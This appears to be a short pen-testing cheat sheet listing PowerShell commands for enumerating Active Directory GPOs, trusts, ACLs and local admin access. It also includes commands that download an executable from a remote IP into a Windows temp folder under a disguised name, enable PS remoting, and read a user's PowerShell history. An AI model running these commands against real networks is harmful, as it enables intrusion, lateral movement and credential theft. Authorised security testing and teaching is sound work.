GPOs Enumeration Active Directory Group Policy Objects

Exploring Active Directory Group Policy Objects (GPOs)

·

1 min read

GPOs Enumeration Active Directory Group Policy Objects

Introduction to Active Directory enumeration with PowerShell for pen-testers.

Understand how to start enumerating a Domain Controller and escalate your privileges inside the network.

GROUP POLICY (GPO) ENUMERATION

Get-NetGPO -ComputerName client-02.rfs.lab
Find-GPOComputerAdmin –Computername client-02.rfs.lab
Find-GPOLocation -UserName Rfs
Get-NetOU

Enumerate Domain trusts

Get-NetDomainTrust

Get-NetForest

Get-NetForest -Forest rfs.lab

Get-NetForestDomain

Get-NetForestCatalog

Get-NetForestTrust

ACLs Enumeration

Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"

Enumerating Users

Find-LocalAdminAccess
Invoke-EnumerateLocalAdmin
Invoke-UserHunter
Invoke-UserHunter -UserName "rfs"
Invoke-UserHunter -CheckAccess

Download Files

(New-Object Net.WebClient).DownloadFile("http://10.10.39.96:80/taskkill.exe","C:\Windows\Temp\rfs.exe")

Invoke WebRequest

Invoke-WebRequest "http://10.10.39.96:80/rfs.exe" -OutFile "rfs.exe"

Windows Remote Management WinRM

enable-psremoting -force Enable-PSRemoting

PowerShell History

Get-Content C:\Users<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt